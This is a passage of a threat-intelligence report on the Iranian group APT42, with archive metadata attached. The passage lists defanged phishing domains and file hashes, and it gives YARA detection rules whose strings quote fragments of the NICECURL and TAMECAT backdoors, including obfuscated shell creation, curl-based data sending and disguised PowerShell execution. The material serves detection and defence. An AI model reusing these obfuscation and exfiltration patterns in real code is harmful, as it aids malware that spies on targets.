N/A\r\nactivity-permission[.]online Generic N/A\r\nadmin-stable-right[.]top Generic N/A\r\nadmiscion[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 24 of 37\n\nadmit-roar-frame[.]top Generic N/A\r\nadvission[.]online Generic N/A\r\naffect-fist-ton[.]online Generic N/A\r\navid-striking-eagerness[.]online Generic N/A\r\nbeaviews[.]online Generic N/A\r\nbesvision[.]top Generic N/A\r\nbloom-flatter-affably[.]top Generic N/A\r\nbook-download[.]shop Generic N/A\r\nbq-ledmagic[.]online Generic N/A\r\nbriview[.]online Generic N/A\r\nchat-services[.]online Generic N/A\r\ncheck-online-panel[.]live Generic N/A\r\ncheck-pabnel-status[.]live Generic N/A\r\ncheck-panel-status[.]live Generic N/A\r\ncheck-panel-status[.]live Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 25 of 37\n\ncheck-short-panel[.]live Generic N/A\r\nconfirmation-process[.]top Generic N/A\r\nconnection-view[.]online Generic N/A\r\ncontinue-meeting[.]site Generic N/A\r\ncontinue-recognized[.]online Generic N/A\r\ncvisiion[.]online Generic N/A\r\ndrive-access[.]site Generic N/A\r\nendorsement-services[.]online Generic N/A\r\nfortune-retire-home[.]top Generic N/A\r\ngeaviews[.]site Generic N/A\r\nglory-uplift-vouch[.]online Generic N/A\r\ngo-conversation[.]lol Generic N/A\r\ngo-forward[.]quest Generic N/A\r\ngview[.]site Generic N/A\r\nhome-continue[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 26 of 37\n\nhome-proceed[.]online Generic N/A\r\nidentifier-direction[.]site Generic N/A\r\nindication-service[.]online Generic N/A\r\njoin-paneling[.]online Generic N/A\r\nksview[.]top Generic N/A\r\nlast-check-leave[.]buzz Generic N/A\r\nlive-project-online[.]live Generic N/A\r\nlive-projects-online[.]top Generic N/A\r\nloriginal[.]online Generic N/A\r\nmail-roundcube[.]site Generic N/A\r\nmeeting-online[.]site Generic N/A\r\nmterview[.]site Generic N/A\r\nnterview[.]site Generic N/A\r\nonline-processing[.]online Generic N/A\r\nonline-video-services[.]site Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 27 of 37\n\novcloud[.]online Generic N/A\r\npanel-check-short[.]live Generic N/A\r\npanel-check-short[.]live Generic N/A\r\npanel-live-check[.]online Generic N/A\r\npanel-short-check[.]live Generic N/A\r\npanel-view-short[.]online Generic N/A\r\npanel-view[.]live Generic N/A\r\npanel-view[.]online Generic N/A\r\npanel-views-cheking[.]live Generic N/A\r\npanelchecking[.]live Generic N/A\r\npaneling-viewing[.]live Generic N/A\r\npanels-views-ckeck[.]live Generic N/A\r\npannel-get-data[.]us Generic N/A\r\nquomodocunquize[.]site Generic N/A\r\nrecognize-validation[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 28 of 37\n\nreconsider[.]site Generic N/A\r\nrevive-project-live[.]online Generic N/A\r\nshort-url[.]live Generic N/A\r\nshort-view[.]online Generic N/A\r\nshortenurl[.]online Generic N/A\r\nshortingurling[.]live Generic N/A\r\nshortlinkview[.]live Generic N/A\r\nshortulonline[.]live Generic N/A\r\nshorting-ce[.]live Generic N/A\r\nshoting-urls[.]live Generic N/A\r\nsimple-process-static[.]top Generic N/A\r\nstatus-short[.]live Generic N/A\r\nstellar-roar-right[.]buzz Generic N/A\r\nsweet-pinnacle-readily[.]online Generic N/A\r\ntcvision[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 29 of 37\n\ntitle-flow-store[.]online Generic N/A\r\ntwision[.]top Generic N/A\r\nushrt[.]us Generic N/A\r\nverify-person-entry[.]top Generic N/A\r\nview-cope-flow[.]online Generic N/A\r\nview-panel[.]live Generic N/A\r\nview-pool-cope[.]online Generic N/A\r\nview-total-step[.]online Generic N/A\r\nviewstand[.]online Generic N/A\r\nviewtop[.]online Generic N/A\r\nvirtue-regular-ready[.]online Generic N/A\r\nwe-transfer[.]shop Generic N/A\r\nURL Shortening Services\r\nm85[.]online Generic N/A\r\ns51[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 30 of 37\n\ns59[.]site Generic N/A\r\ns20[.]site Generic N/A\r\nd75[.]site Generic N/A\r\nCluster C\r\nURL Shortening Services\r\nbitly[.]org[.]il Bitly Israel\r\nlitby[.]us Bitly U.S.\r\nMailer Daemon\r\ndaemon-mailer[.]co Mailer Daemon N/A\r\ndaemon-mailer[.]info Mailer Daemon N/A\r\nemail-daemon[.]biz Mailer Daemon N/A\r\nemail-daemon[.]biz[.]tinurls[.]com Mailer Daemon N/A\r\nemail-daemon[.]online[.]tinurls[.]com Mailer Daemon N/A\r\nemail-daemon[.]online Mailer Daemon N/A\r\nemail-daemon[.]site Mailer Daemon N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 31 of 37\n\nmailer-daemon[.]info Mailer Daemon N/A\r\nmailerdaemon[.]online Mailer Daemon N/A\r\nmailer-daemon[.]us Mailer Daemon N/A\r\nThink Tanks \u0026 Research Institutes\r\naspenlnstitute[.]org Aspen Institute U.S.\r\nmccainlnstitute[.]org Mccain Institute U.S.\r\nwashingtonlnstitute[.]org The Washington Institute U.S.\r\nFile Sharing Services\r\nyoutransfer[.]live YouTransfer N/A\r\nMiscellaneous \r\ng-online[.]org Generic N/A\r\nonline-access[.]live Generic N/A\r\nyouronlineregister[.]com Generic N/A\r\nMalware Operations\r\nNICECURL\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 32 of 37\n\nRelated IOCs\r\nd5a05212f5931d50bb024567a2873642\r\n347b273df245f5e1fcbef32f5b836f1d\r\n2f6bf8586ed0a87ef3d156124de32757\r\n13aa118181ac6a202f0a64c0c7a61ce7\r\nc23663ebdfbc340457201dbec7469386\r\n853687659483d215309941dae391a68f\r\ndrive-file-share[.]site\r\nprism-west-candy[.]glitch[.]me\r\nNICECURL: YARA Rules\r\nrule M_APT_Backdoor_NICECURL_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nmd5 = \"c23663ebdfbc340457201dbec7469386\"\r\ndate_created = \"2024-01-18\"\r\n date_modified = \"2024-01-18\"\r\n rev = \"1\"\r\nstrings:\r\n$ = \"a = \\\"llehS.tpircsW\\\"\" ascii wide\r\n$ = \"b = StrReverse(a)\" ascii wide\r\n$ = \"Set objShell = wscript.CreateObject(b)\"\r\n$ = \"WHFilePath = Temp \u0026 \\\"/\\\" \u0026 ProgName\" ascii wide\r\n$ = \"Do While not FileExists(WHFilePath)\" ascii wide\r\n$ = \"cmd /C start /MIN curl --ssl-no-revoke -s -d \\\"\\\"\\\"\" ascii wide\r\n$ = \"nicecmdPath = Temp \u0026 \\\"/\\\" \u0026 ProgName\" ascii wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 33 of 37\n\n$ = \"Function RunCom(Com, Url, nicecmdPath)\" ascii wide\r\n$ = \"ComDecode = Base64Decode(Com)\" ascii wide\r\n$ = \"InStr(ComDecode, \\\"kill\\\")\" ascii wide\r\n$ = \"InStr(ComDecode, \\\"SetNewConfig\\\")\" ascii wide\r\n$ = \"InStr(ComDecode, \\\"Module\\\")\" ascii wide\r\n$ = \"Sub DeleteFile(filespec)\" ascii wide\r\n$ = \"Sub CopyFile(Src, Dst)\" ascii wide\r\n$ = \"Function SendData(sUrl, sRequest, nicecmdPath)\" ascii wide\r\n$ = \"Function WriteToFile(FilePath, data)\" ascii wide\r\n$ = \"Function GetSystemCaption()\" ascii wide\r\n$ = \"Function GetPlainSess()\" ascii wide\r\ncondition:\r\n4 of them\r\n}\r\nrule M_APT_Backdoor_NICECURL_datamine_module_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nmd5 = \"853687659483d215309941dae391a68f\"\r\ndate_created = \"2024-01-18\"\r\n date_modified = \"2024-01-18\"\r\n rev = \"1\"\r\nstrings:\r\n$ = \"a = \\\"llehS.tpircsW\\\"\" ascii wide\r\n$ = \"b = StrReverse(a)\" ascii wide\r\n$ = \"Set objShell = wscript.CreateObject(b)\" ascii wide\r\n$ = \"ModuleName \u0026 \\\" module started successfully.\\\"\" ascii wide\r\n$ = \"SendLog(MAC, Logs, ModuleName, \\\"Success\\\")\" ascii wide\r\n$ = \"\u0026 vbNewLine \u0026 \\\"*** Ant:\\\"\" ascii wide\r\n$ = \"For Each antivirus in installedAntiviruses\" ascii wide\r\n$ = \"list=list \u0026 VBNewLine \u0026 antivirus.displayName\" ascii wide\r\n$ = \"checking the state of the 12th bit of productState property of\r\nthe antivirus\" ascii wide\r\n$ = \"For Each item In query_result\" ascii wide\r\n$ = \"Set query_result = objWMI.ExecQuery(\\\"\" ascii wide\r\n$ = \"Function SendFile(FilePath, ModuleName)\" ascii wide\r\n$ = \"Function SendData(Base64Data, FolderName, FileName, Format)\"\r\nascii wide\r\n$ = \"call HTTPPost(Url, sRequest)\" ascii wide\r\n$ = \"ChunckData = Mid(Base64Data, 1, lengthdata)\" ascii wide\r\n$ = \"ChunckData = Mid(Base64Data, (i * lengthdata) + 1)\" ascii wide\r\n$ = \"ChunckData = Mid(Base64Data, (i * lengthdata) + 1, lengthdata)\"\r\nascii wide\r\n$ = \"Function SendLog(MAC, Logs, ModuleName, Status)\" ascii wide\r\ncondition:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 34 of 37\n\n4 of them\r\n}\r\nTAMECAT\r\nRelated IOCs\r\nd7bf138d1aa2b70d6204a2f3c3bc72a7\r\n081419a484bbf99f278ce636d445b9d8\r\nc3b9191f3a3c139ae886c0840709865e\r\ndd2653a2543fa44eaeeff3ca82fe3513\r\n9c5337e0b1aef2657948fd5e82bdb4c3\r\ntnt200[.]mywire[.]org\r\naccurate-sprout-porpoise[.]glitch[.]me\r\nTAMECAT: YARA Rules\r\nrule M_APT_Backdoor_TAMECAT_2 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nmd5 = \"9c5337e0b1aef2657948fd5e82bdb4c3\"\r\ndate_created = \"2024-03-05\"\r\n date_modified = \"2024-03-05\"\r\n rev = \"1\"\r\nstrings:\r\n$ = \"$a.CreateDecryptor($a.Key,$a.iv)\"\r\n$ = \"$CommandParts = \\\"\\\"\"\r\n$ = \"$macP = $env:APPDATA+\\\"\\\\\"\r\n$ = \"$macP = \\\"$env:LOCALAPPDATA\\\\\"\r\n$ = \"$mac += Get-Content -Path $macP\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 35 of 37\n\n$ = \"$CommandParts =$SessionResponse.Split(\\\"\"\r\n$ = \"[string]$CommandPart = \\\"\\\";\"\r\n$ = \"Foreach ($CommandPart in $CommandParts)\"\r\n$ = \"$CommandPart.Split(\\\"~\\\");\"\r\n$ = \"elseif($StartStop -eq \\\"stop\\\")\"\r\n$ = \"if($StartStop -eq \\\"start\\\")\"\r\n$ = \"\u0026(gcm *ke-e*) $Command;\"\r\ncondition:\r\n3 of them and filesize\u003c2MB\r\n}\r\nrule M_APT_Downloader_TAMECAT_NICECURL_VBScript_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"d7bf138d1aa2b70d6204a2f3c3bc72a7\"\r\n date_created = \"2024-03-13\"\r\n date_modified = \"2024-03-13\"\r\n rev = \"1\"\r\n strings:\r\n $ = \"For Each antivirus in installedAntiviruses\"\r\n $ = \"list=list \u0026 VBNewLine \u0026 antivirus.displayName\"\r\n $ = \"\\\"conhost conhost powershell.exe -w 1 -c \\\"\"\r\n $ = \"-UseBasicParsing).Content; \u0026(gcm *e-e?p*)$\"\r\n $ = \"Set oE = objShell.Exec(\"\r\n $ = \"\\\"cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d \\\"\"\r\n $ = \"\u0026 call %c:9=% \u0026 set b=sta9rt\"\r\n condition:\r\n 3 of them\r\n}\r\nrule M_APT_Backdoor_TAMECAT {\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"d7bf138d1aa2b70d6204a2f3c3bc72a7\"\r\n date_created = \"2024-03-11\"\r\n date_modified = \"2024-03-11\"\r\n rev = \"1\"\r\n strings:\r\n $s1 = \"OutputCom = OutputCom \u0026 \\\"NOT_FOUND\\\"\" ascii wide\r\n $s2 = \"OutputCom = OutputCom \u0026 list\" ascii wide\r\n $s3 = \"If antivirus.productState And \u0026h01000 Then\" ascii wide\r\n condition:\r\n all of them\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 36 of 37\n\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 37 of 37", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations" ], "report_names": [ "untangling-iran-apt42-operations" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "82f54603-89e0-4f5a-8df9-eae0c3a90d70", "created_at": "2022-10-25T16:07:23.745406Z", "updated_at": "2026-04-10T02:00:04.734764Z", "deleted_at": null, "main_name": "ITG18", "aliases": [], "source_name": "ETDA:ITG18", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1", "created_at": "2023-03-04T02:01:54.091301Z", "updated_at": "2026-04-10T02:00:03.356317Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "UNC788", "CALANQUE" ], "source_name": "MISPGALAXY:APT42", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ae26d287-8ba7-447e-9391-cf13c02d7481", "created_at": "2023-03-04T02:01:54.0962Z", "updated_at": "2026-04-10T02:00:03.357189Z", "deleted_at": null, "main_name": "TA453", "aliases": [], "source_name": "MISPGALAXY:TA453", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8", "created_at": "2025-04-23T02:00:55.275208Z", "updated_at": "2026-04-10T02:00:05.270553Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "APT42" ], "source_name": "MITRE:APT42", "tools": [ "NICECURL", "TAMECAT" ], "source_id": "MITRE", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434587, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35.pdf", "text": "https://archive.orkl.eu/e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35.txt", "img": "https://archive.orkl.eu/e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35.jpg" } }